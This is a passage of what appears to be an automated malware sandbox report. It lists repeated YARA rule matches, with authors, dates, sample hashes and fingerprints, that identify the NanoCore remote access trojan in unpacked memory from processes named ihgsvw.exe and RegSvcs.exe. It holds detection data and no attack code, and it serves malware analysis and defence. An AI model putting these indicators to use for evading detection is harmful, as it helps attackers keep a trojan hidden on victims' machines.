      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
